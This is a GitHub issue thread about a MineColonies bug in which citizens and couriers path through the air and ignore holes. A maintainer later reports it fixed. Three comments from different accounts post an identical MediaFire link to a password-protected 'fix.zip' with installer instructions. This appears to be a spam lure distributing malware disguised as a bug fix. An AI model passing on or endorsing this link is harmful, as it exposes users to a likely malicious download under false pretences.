### ISSUE TITLE
[BUG] Citizens ignore holes.

### ISSUE THREAD

**Issue by fulmoonless** [ldtteam/minecolonies#10168]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Are you using the latest MineColonies Version?

- [X] I am running the latest **beta** version of MineColonies for my Minecraft version.

### Did you check on the Wiki? or ask on Discord?

- [X] I checked the MineColonies Wiki and made sure my issue is not covered there. Or I was sent from discord to open an issue here.

### What were you playing at the time? Were you able to reproduce it in both settings?

- [X] Single Player
- [ ] Multi Player

### Minecraft Version

1.20.1

### MineColonies Version

1.20.1-1.1.646

### Structurize Version

1.20.1-1.0.742

### Related Mods and their Versions

Minecolonies Offical WinterColonies-1.11

### Current Behavior

https://youtu.be/TFUSpgO7XC8
One day, I suddenly noticed strange behavior from the courier, which seems to indicate that their pathing points are entirely generated in the air. This could be related to several other bugs and the issue of couriers falling to their deaths. Additionally, I've previously noticed my courier getting stuck while trying to walk over a one-block hole in the warehouse. If I've recently used the trackpath to find the issue, I'll supplement it with images of the trackpath points.

### Expected Behavior

Don't ignore holes.

### Reproduction Steps

Dig a lot of holes and wait for citizens to fall in...?

### Logs

No crash

### Anything else?

* Add a thumbs-up to the bug report if you are also affected. This helps the bug report become more visible to the team and doesn't clutter the comments.
* Add a comment if you have any insights or background information that isn't already part of the conversation.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fulmoonless** [comment]
![image](https://github.com/user-attachments/assets/1817d7e7-4d3f-49b0-835d-32cb93e25a46)

**Comment by Raycoms** [comment]
fixed, although holes in the last couple of seconds are sometimes ignored
